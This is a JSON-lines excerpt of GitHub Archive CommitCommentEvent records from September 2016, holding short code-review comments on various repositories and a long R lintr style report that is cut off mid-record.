{"id":"4588502829","type":"CommitCommentEvent","actor":{"login":"atd"},"repo":{"name":"P2Pvalue/teem"},"payload":{"comment":{"id":19093304,"position":2,"line":1,"path":"src/templates/projects/project.html","commit_id":"276b6b1fed71ba510d4de33c3f96e990eb9bcae3","created_at":"2016-09-20T09:31:29Z","updated_at":"2016-09-20T09:31:29Z","body":"Cool!"}},"created_at":"2016-09-20T09:31:29Z"}
{"id":"4588504097","type":"CommitCommentEvent","actor":{"login":"likailee"},"repo":{"name":"likailee/CarouselDemo"},"payload":{"comment":{"id":19093306,"position":10,"line":10,"path":"Carousel.js","commit_id":"c3a995554c2b4937d425753b8a3fa7a35dc4387b","created_at":"2016-09-20T09:31:43Z","updated_at":"2016-09-20T09:31:43Z","body":"效果不是很好"}},"created_at":"2016-09-20T09:31:43Z"}
{"id":"4588507450","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"Jenly/android_device_lge_mako-n"},"payload":{"comment":{"id":19093318,"position":null,"line":null,"path":null,"commit_id":"c8bc6bb97f798467a1c12666f3d91d6912f4813a","created_at":"2016-09-20T09:32:22Z","updated_at":"2016-09-20T09:32:22Z","body":"@Jenly Are you work on xiaomi aries nougat \r\ni work on it too. \r\nwould you like to join my slack group. \r\nhttps://aries-dev.slack.com/"}},"created_at":"2016-09-20T09:32:22Z"}
{"id":"4588508014","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"jelhan/croodle"},"payload":{"comment":{"id":19093322,"position":5,"line":8,"path":"app/locales/es/translations.js","commit_id":"ed87a86c2c966e7a5505c117ad8c1b8149aed0b3","created_at":"2016-09-20T09:32:29Z","updated_at":"2016-09-20T09:32:29Z","body":"I am sure. Do you really need a PR for this?"}},"created_at":"2016-09-20T09:32:29Z"}
{"id":"4588508919","type":"CommitCommentEvent","actor":{"login":"bonion"},"repo":{"name":"bonion/Domoleaf"},"payload":{"comment":{"id":19093323,"position":null,"line":null,"path":null,"commit_id":"ec723034b2cbaafc2ece3882440f093fa49699de","created_at":"2016-09-20T09:32:40Z","updated_at":"2016-09-20T09:32:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GqKXIwtF&#x2F;24-commentaires-code\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Commentaires code</a>"}},"created_at":"2016-09-20T09:32:40Z"}
{"id":"4588510205","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":19093327,"position":220,"line":220,"path":"wk3/Hangmanpersonal/SecondPart.js","commit_id":"a19c58bd8630949fd1e1a67151e97729fc19ce5c","created_at":"2016-09-20T09:32:54Z","updated_at":"2016-09-20T09:32:54Z","body":"This all makes sense to me. Some relatively minor points:\r\n\r\n* You should wrap all of this in `(function() { ...  })();` so all of the variables you create are not in in global scope\r\n\r\n* This would be easier to read with better indentation. Normally after a `{` there should be a line break and the stuff on the following lines should be indented over and the `}` should be on a new line and align with the start of the line containing the matching `{` "}},"created_at":"2016-09-20T09:32:54Z"}
{"id":"4588515168","type":"CommitCommentEvent","actor":{"login":"BluSunrize"},"repo":{"name":"malte0811/ImmersiveEngineering"},"payload":{"comment":{"id":19093335,"position":null,"line":null,"path":null,"commit_id":"582e7c26a744ac372e93f799fb6a4887850dc34d","created_at":"2016-09-20T09:33:53Z","updated_at":"2016-09-20T09:33:53Z","body":"Looks alright, go for it"}},"created_at":"2016-09-20T09:33:53Z"}
{"id":"4588516701","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19093340,"position":50,"line":78,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/ScheduleViewMB.java","commit_id":"f7bd6d2fbe2359ebdd075c55de351f64389eb3b6","created_at":"2016-09-20T09:34:12Z","updated_at":"2016-09-20T09:34:12Z","body":"Duplicate trailing semicolon."}},"created_at":"2016-09-20T09:34:12Z"}
{"id":"4588518638","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19093343,"position":41,"line":70,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/ScheduleViewMB.java","commit_id":"f7bd6d2fbe2359ebdd075c55de351f64389eb3b6","created_at":"2016-09-20T09:34:35Z","updated_at":"2016-09-20T09:34:35Z","body":"Move event object mapping to utility method."}},"created_at":"2016-09-20T09:34:35Z"}
{"id":"4588522736","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19093349,"position":null,"line":null,"path":null,"commit_id":"6381347b707ae411c9c3e88f17f5ba7fda7f98d9","created_at":"2016-09-20T09:35:22Z","updated_at":"2016-09-20T09:35:22Z","body":"Initial commit."}},"created_at":"2016-09-20T09:35:22Z"}
{"id":"4588523712","type":"CommitCommentEvent","actor":{"login":"andreasabel"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":19093354,"position":null,"line":null,"path":null,"commit_id":"204ede0ae92eee7365159f4b869b2c49e63970ea","created_at":"2016-09-20T09:35:34Z","updated_at":"2016-09-20T09:35:34Z","body":"Thanks. That ended up on master instead of stable-2.5. I'll cherry-pick..."}},"created_at":"2016-09-20T09:35:34Z"}
{"id":"4588524157","type":"CommitCommentEvent","actor":{"login":"GillesLouwerens"},"repo":{"name":"GillesLouwerens/Hello-World"},"payload":{"comment":{"id":19093355,"position":1,"line":1,"path":"README.md","commit_id":"4a12ea985f724cb6c33307753984e22499483a77","created_at":"2016-09-20T09:35:40Z","updated_at":"2016-09-20T09:35:40Z","body":"I am changing this to Hello-Europe"}},"created_at":"2016-09-20T09:35:40Z"}
{"id":"4588524460","type":"CommitCommentEvent","actor":{"login":"ianrrees"},"repo":{"name":"EvilMav/python-ivi"},"payload":{"comment":{"id":19093356,"position":null,"line":null,"path":null,"commit_id":"5c5bcd3cc889e975fcde7fc862d3d4a2c8f81c8d","created_at":"2016-09-20T09:35:43Z","updated_at":"2016-09-20T09:35:43Z","body":"No worries, I've been staying pretty busy with other stuff anyways.  Will try to have a play with it this weekend."}},"created_at":"2016-09-20T09:35:43Z"}
{"id":"4588525232","type":"CommitCommentEvent","actor":{"login":"TheodoraDimitrova"},"repo":{"name":"TheodoraDimitrova/first-repo"},"payload":{"comment":{"id":19093361,"position":4,"line":13,"path":"test project github/test project github/Program.cs","commit_id":"18c8bbbacbd872e2ab639d441c22ece79c13291e","created_at":"2016-09-20T09:35:53Z","updated_at":"2016-09-20T09:35:53Z","body":"test2\r\n"}},"created_at":"2016-09-20T09:35:53Z"}
{"id":"4588528208","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"Jenly/android_device_lge_mako-n"},"payload":{"comment":{"id":19093369,"position":null,"line":null,"path":null,"commit_id":"c8bc6bb97f798467a1c12666f3d91d6912f4813a","created_at":"2016-09-20T09:36:27Z","updated_at":"2016-09-20T09:36:27Z","body":"my project laid on https://github.com/multirom-aries"}},"created_at":"2016-09-20T09:36:27Z"}
{"id":"4588529197","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19093373,"position":null,"line":null,"path":null,"commit_id":"ef97d275617d8ca57849c09733203f2ef125e50b","created_at":"2016-09-20T09:36:39Z","updated_at":"2016-09-20T09:36:39Z","body":"Initial commit."}},"created_at":"2016-09-20T09:36:39Z"}
{"id":"4588530856","type":"CommitCommentEvent","actor":{"login":"BIgerMe"},"repo":{"name":"BIgerMe/PHP"},"payload":{"comment":{"id":19093378,"position":null,"line":null,"path":null,"commit_id":"871717f789b6e7b18b2c74de115e2ef1fed63385","created_at":"2016-09-20T09:37:00Z","updated_at":"2016-09-20T09:37:00Z","body":"。。"}},"created_at":"2016-09-20T09:37:00Z"}
{"id":"4588531952","type":"CommitCommentEvent","actor":{"login":"DmitriyTSt"},"repo":{"name":"DmitriyTSt/VK-Old-unread"},"payload":{"comment":{"id":19093381,"position":40,"line":16,"path":"background.js","commit_id":"17353e160dfd33f468c79731f5ce69c39ebbd6f7","created_at":"2016-09-20T09:37:13Z","updated_at":"2016-09-20T09:37:13Z","body":"Добавить \"умное\" сохранение старых данных при новом пункте опций"}},"created_at":"2016-09-20T09:37:13Z"}
{"id":"4588533100","type":"CommitCommentEvent","actor":{"login":"GillesLouwerens"},"repo":{"name":"GillesLouwerens/Hello-World"},"payload":{"comment":{"id":19093382,"position":null,"line":null,"path":null,"commit_id":"4a12ea985f724cb6c33307753984e22499483a77","created_at":"2016-09-20T09:37:27Z","updated_at":"2016-09-20T09:37:27Z","body":"Is this the master or commit?"}},"created_at":"2016-09-20T09:37:27Z"}
{"id":"4588534179","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19093389,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T09:37:40Z","updated_at":"2016-09-20T09:37:40Z","body":"Just out of curiosity, why did you move this part: \r\n\r\n````\r\nif (!stmAttackers)\r\n        return swapList[0];\r\n````\r\n\r\nbefore the pinners and the discovered checks part ?"}},"created_at":"2016-09-20T09:37:40Z"}
{"id":"4588536486","type":"CommitCommentEvent","actor":{"login":"zzqowen"},"repo":{"name":"zzqowen/zzqowen.github.io"},"payload":{"comment":{"id":19093395,"position":null,"line":null,"path":null,"commit_id":"c55183b89ee8fb0a8f077c09c9bbb6e211319c47","created_at":"2016-09-20T09:38:07Z","updated_at":"2016-09-20T09:38:07Z","body":"wode"}},"created_at":"2016-09-20T09:38:07Z"}
{"id":"4588537135","type":"CommitCommentEvent","actor":{"login":"DaveRandom"},"repo":{"name":"Room-11/Jeeves"},"payload":{"comment":{"id":19093396,"position":6,"line":37,"path":"composer.json","commit_id":"d6dc8186f51992d5052e244edf9eae1b28373a57","created_at":"2016-09-20T09:38:13Z","updated_at":"2016-09-20T09:38:13Z","body":"We don't need to declare a specific ext because it's just DOM, which is everywhere, but we do have a minimum requirement for the version of libxml that it's built against because we need `LIBXML_HTML_NODEFDTD`"}},"created_at":"2016-09-20T09:38:13Z"}
{"id":"4588537419","type":"CommitCommentEvent","actor":{"login":"junmipapa"},"repo":{"name":"junmipapa/FirstProjecty"},"payload":{"comment":{"id":19093397,"position":null,"line":null,"path":null,"commit_id":"e06096e866eb554e9a3bdf9113d29a97683b7a43","created_at":"2016-09-20T09:38:17Z","updated_at":"2016-09-20T09:38:17Z","body":"ok"}},"created_at":"2016-09-20T09:38:17Z"}
{"id":"4588539350","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19093405,"position":null,"line":null,"path":null,"commit_id":"cbc63623a67e5faba4305a5304d68e9c26dcd98b","created_at":"2016-09-20T09:38:41Z","updated_at":"2016-09-20T09:38:41Z","body":"Initial commit."}},"created_at":"2016-09-20T09:38:41Z"}
{"id":"4588542523","type":"CommitCommentEvent","actor":{"login":"aaronkaplan"},"repo":{"name":"certat/intelmq"},"payload":{"comment":{"id":19093413,"position":null,"line":null,"path":null,"commit_id":"3e5107aa96ac33f7678d07863845192f82d198d2","created_at":"2016-09-20T09:39:19Z","updated_at":"2016-09-20T09:39:19Z","body":"oops, thx"}},"created_at":"2016-09-20T09:39:19Z"}
{"id":"4588546360","type":"CommitCommentEvent","actor":{"login":"lados"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19093418,"position":null,"line":null,"path":null,"commit_id":"c0027464296014fb1458c7112964c5db0baba96c","created_at":"2016-09-20T09:40:05Z","updated_at":"2016-09-20T09:40:05Z","body":"Hali!\n\n2016-09-20 11:30 keltezéssel, attuska írta:\n> Ez a solarized elég jól néz ki, én akár alapértelmezetté is emelném.\n> https://github.com/MalditoBarbudo/solarized_sddm_theme\n> \n\nTényleg nem rossz.\n\nÜdv.\n\n"}},"created_at":"2016-09-20T09:40:05Z"}
{"id":"4588546638","type":"CommitCommentEvent","actor":{"login":"jmichel80"},"repo":{"name":"michellab/Sire"},"payload":{"comment":{"id":19093420,"position":null,"line":null,"path":null,"commit_id":"fcbeb8e38b63a0ad00c8502dd62d1fea8f551275","created_at":"2016-09-20T09:40:09Z","updated_at":"2016-09-20T09:40:09Z","body":"Hi Stefano, \r\n\r\nThe code needs to be more general to be eventually merged into the main branch. Can you structure the code to avoid having to hardcode list of solvent residue names ? \r\nWhat we need is an input option such that bond/angles constraints are *ignored* for a specific molecule group (\"unconstrained_mols\"). This information will appear in the simulation config file, will be used to populate this group with with molecules in the python layer, and the resulting Sire object made available to the openmm interface.   By default \"unconstrained_mols\" will be empty, unless the user has specified molecules. "}},"created_at":"2016-09-20T09:40:09Z"}
{"id":"4588549462","type":"CommitCommentEvent","actor":{"login":"iocanel"},"repo":{"name":"fabric8io/fabric8-maven-plugin"},"payload":{"comment":{"id":19093427,"position":238,"line":238,"path":"plugin/src/main/java/io/fabric8/maven/plugin/DebugMojo.java","commit_id":"615adeb3ac33e59c5ba9a8d3ee221b1c8cc66552","created_at":"2016-09-20T09:40:42Z","updated_at":"2016-09-20T09:40:42Z","body":"FWIW, this is only available in 1.8+ "}},"created_at":"2016-09-20T09:40:42Z"}
{"id":"4588549661","type":"CommitCommentEvent","actor":{"login":"351539365"},"repo":{"name":"351539365/cici"},"payload":{"comment":{"id":19093429,"position":10,"line":10,"path":"test_ssh/WebContent/WEB-INF/web.xml","commit_id":"7f58883e729ecf37312c7e5a7c07be4b31f19f47","created_at":"2016-09-20T09:40:45Z","updated_at":"2016-09-20T09:40:45Z","body":"000"}},"created_at":"2016-09-20T09:40:45Z"}
{"id":"4588551067","type":"CommitCommentEvent","actor":{"login":"GillesLouwerens"},"repo":{"name":"GillesLouwerens/Hello-World"},"payload":{"comment":{"id":19093432,"position":null,"line":null,"path":null,"commit_id":"4a12ea985f724cb6c33307753984e22499483a77","created_at":"2016-09-20T09:41:02Z","updated_at":"2016-09-20T09:41:02Z","body":"This is not in another branch I guess"}},"created_at":"2016-09-20T09:41:02Z"}
{"id":"4588553874","type":"CommitCommentEvent","actor":{"login":"GillesLouwerens"},"repo":{"name":"GillesLouwerens/Hello-World"},"payload":{"comment":{"id":19093440,"position":1,"line":1,"path":"README.md","commit_id":"4a12ea985f724cb6c33307753984e22499483a77","created_at":"2016-09-20T09:41:37Z","updated_at":"2016-09-20T09:41:37Z","body":"Not in separate branche?"}},"created_at":"2016-09-20T09:41:37Z"}
{"id":"4588554058","type":"CommitCommentEvent","actor":{"login":"NicolasSch"},"repo":{"name":"njiuko/sabredav_client"},"payload":{"comment":{"id":19093441,"position":null,"line":null,"path":null,"commit_id":"b337c5a81a46c421197561a34c468b4cf07c0d59","created_at":"2016-09-20T09:41:39Z","updated_at":"2016-09-20T09:41:39Z","body":"i wonder about that? sabredav needs these quotes I think."}},"created_at":"2016-09-20T09:41:39Z"}
{"id":"4588554551","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19093442,"position":2,"line":2,"path":"tutu/app/models/railway_station.rb","commit_id":"4e15f2ded5793fea3fb00da09f2becb7a4c57c2a","created_at":"2016-09-20T09:41:45Z","updated_at":"2016-09-20T09:41:45Z","body":"В моделях принято сначала писать ассоциации, затем валидации"}},"created_at":"2016-09-20T09:41:45Z"}
{"id":"4588556171","type":"CommitCommentEvent","actor":{"login":"soumyanishan"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":19093444,"position":1,"line":1,"path":"VMBackup/main/Utils/Status.py","commit_id":"e481a6f4244471f9bc779ae5d55aca801b817a80","created_at":"2016-09-20T09:42:06Z","updated_at":"2016-09-20T09:42:06Z","body":"inside Utils is not recommended. Please move it out in next iteration."}},"created_at":"2016-09-20T09:42:06Z"}
{"id":"4588557570","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19093449,"position":5,"line":5,"path":"tutu/app/models/railway_station.rb","commit_id":"4e15f2ded5793fea3fb00da09f2becb7a4c57c2a","created_at":"2016-09-20T09:42:23Z","updated_at":"2016-09-20T09:42:23Z","body":"Зачем так много пустых строк? Пустой строкой стоит отделить блок ассоциаций от валидаций, но каждую строку отделять пустой - это перебор."}},"created_at":"2016-09-20T09:42:23Z"}
{"id":"4588559253","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19093453,"position":2,"line":2,"path":"tutu/app/models/route.rb","commit_id":"4e15f2ded5793fea3fb00da09f2becb7a4c57c2a","created_at":"2016-09-20T09:42:44Z","updated_at":"2016-09-20T09:42:44Z","body":"Сначала ассоциации, затем валидации"}},"created_at":"2016-09-20T09:42:44Z"}
{"id":"4588564595","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19093464,"position":1,"line":1,"path":"tutu/app/models/route.rb","commit_id":"4e15f2ded5793fea3fb00da09f2becb7a4c57c2a","created_at":"2016-09-20T09:43:46Z","updated_at":"2016-09-20T09:43:46Z","body":"Нужна ассоциация между поездом и маршрутом (У маршрута может быть много поездов, у поезда - один маршрут)"}},"created_at":"2016-09-20T09:43:46Z"}
{"id":"4588567557","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19093469,"position":null,"line":null,"path":null,"commit_id":"9694c6822269b3c41c1358f3f5545de295aeb16c","created_at":"2016-09-20T09:44:21Z","updated_at":"2016-09-20T09:44:21Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:88:6:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:89:7:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L89) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:91:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L91) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:18:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:18:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:18:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:101:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:102:17:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:103:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L103) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:104:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:21:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L111) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:112:26:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L112) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L113) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:120:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L120) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:7:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L124) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:124:10:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:124:23:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L124) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:124:29:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L124) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:145:5:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:146:28:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L146) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:191:20:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/ABC_SMC.R#L191) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   